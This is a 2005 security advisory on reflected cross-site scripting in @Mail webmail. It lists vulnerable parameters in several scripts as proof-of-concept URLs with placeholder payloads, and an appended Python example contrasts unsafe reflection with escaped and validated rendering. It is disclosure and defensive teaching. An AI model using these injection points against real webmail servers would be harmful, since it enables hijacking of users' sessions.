#############################################
@Mail multiple variable cross-site scripting
vendor url: http://www.atmail.com
Advisory: http://lostmon.blogspot.com/2005/07/mail-multiple-variable-cross-site.html
vendor notify: yes
exploit available: yes
##############################################

@Mail is a feature-rich email solution that allows users to access email resources via the web or a variety of wireless devices. The software incorporates a complete email-server package to manage and host user email at your domain(s).

@Mail contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate multiple variables upon submission to multiple scripts. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

#############
versions
#############

@Mail 4.03 WebMail for Windows
@Mail 4.11 - Linux / FreeBSD / Solaris / HP-UX / OS-X
It is also possible that other versions are vulnerable.

#################
Timeline
#################

Discovered: 2-07-2005
vendor notify: 27-07-2005
vendor response: 28-07-2005
disclosure: 28-07-2005

##################
Proof of concepts
##################

Exploiting these flaws requires a client login, and exploiting the flaws in /webadmin/ requires an admin login.

###################
printcal.pl
###################

http://[victim]/printcal.pl?year=[XSS-CODE]&month=11&type=4
http://[victim]/printcal.pl?year=&month=11&type=4[XSS-CODE]
http://[victim]/printcal.pl?type=4[XSS-CODE]

###################
task.pl
###################

http://[victim]/task.pl?func=todo[XSS-CODE]

###################
compose.pl
####################

http://[victim]/compose.pl?id=cur/1117452847.H104572P10795.[victim].com%3A2%2C&folder=Sent&cache=&func=reply&type=reply[XSS-CODE]
http://[victim]/compose.pl?spellcheck=112253846919856.sc.new&func=spellcheck&HtmlEditor=1&unique=19944&msgtype=r[XSS-CODE]
http://[victim]/compose.pl?spellcheck=112253846919856.sc.new&func=spellcheck&HtmlEditor=1&unique=19944[XSS-CODE]&msgtype=r
http://[victim]/compose.pl?func=new&To=lala@lala.es&Cc=&Bcc=[XSS-CODE]
http://[victim]/compose.pl?func=new&To=lala@lala.es&Cc=[XSS-CODE]&Bcc=
http://[victim]/compose.pl?func=new&To=lala@lala.es[XSS-CODE]&Cc=&Bcc=

###################
webadmin/filter.pl
###################

http://[victim]/webadmin/filter.pl?func=viewmailrelay&Order=IPaddress[XSS-CODE]
http://[victim]/webadmin/filter.pl?func=filter&Header=blacklist_from&Type=1[XSS-CODE]&View=1
http://[victim]/webadmin/filter.pl?func=filter&Header=blacklist_from[XSS-CODE]&Type=1&View=1
http://[victim]/webadmin/filter.pl?func=filter&Header=whitelist_from&Type=0&Display=1&Sort=value[XSS-CODE]&Type=1&View=1

########################
End
##########################

Thanks to Estrella for being my light.

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/

--
Curiosity is what moves the mind....
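The root cause the advisory names is that query parameters are reflected into the page without validation or encoding. The following is an added illustration, not @Mail's code and not part of the original advisory: a small Python stand-in for a CGI script like printcal.pl that reflects its year/month/type parameters, shown in the unsafe form and in two hardened forms (output encoding, and input validation with encoding as defence in depth). The URL, host name and marker payload are constructed for the example.

```python
# Added example (not @Mail's code): unsafe parameter reflection beside its hardened forms.
import re
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed request modelled on the advisory's printcal.pl pattern. The script
# name and parameter names are from the advisory; the host and the harmless
# <b> marker in place of [XSS-CODE] are constructed for this example.
SAMPLE_URL = "http://webmail.example.invalid/printcal.pl?year=<b>marker</b>&month=11&type=4"

# Expected shape of each parameter; anything else is rejected before rendering.
PARAM_SHAPES = {
    "year": r"\d{4}",
    "month": r"\d{1,2}",
    "type": r"\d",
}


def query_params(url):
    """Return the first value of each query parameter, like a CGI param() lookup."""
    query = urlsplit(url).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def render_unsafe(params):
    """Reflects raw parameter values into HTML: the bug class the advisory describes."""
    return "<h1>Calendar for {year}/{month}, view {type}</h1>".format(**params)


def render_escaped(params):
    """Hardened form 1: HTML-escape every value before it reaches the page."""
    safe = {k: escape(v, quote=True) for k, v in params.items()}
    return "<h1>Calendar for {year}/{month}, view {type}</h1>".format(**safe)


def render_validated(params):
    """Hardened form 2: reject values of the wrong shape, then escape anyway.

    Returns None when a parameter fails validation; the caller answers 400.
    """
    for name, pattern in PARAM_SHAPES.items():
        if re.fullmatch(pattern, params.get(name, "")) is None:
            return None
    return render_escaped(params)  # escaping stays on as defence in depth


if __name__ == "__main__":
    p = query_params(SAMPLE_URL)
    print("unsafe:   ", render_unsafe(p))      # marker survives as live markup
    print("escaped:  ", render_escaped(p))     # marker is inert text
    print("validated:", render_validated(p))   # rejected outright
```

Escaping alone fixes the reflection; the validation layer additionally rejects requests whose parameters cannot be legitimate (a year or type with trailing markup, as in the PoC URLs), which is also the cheapest place to log and alert on such probes.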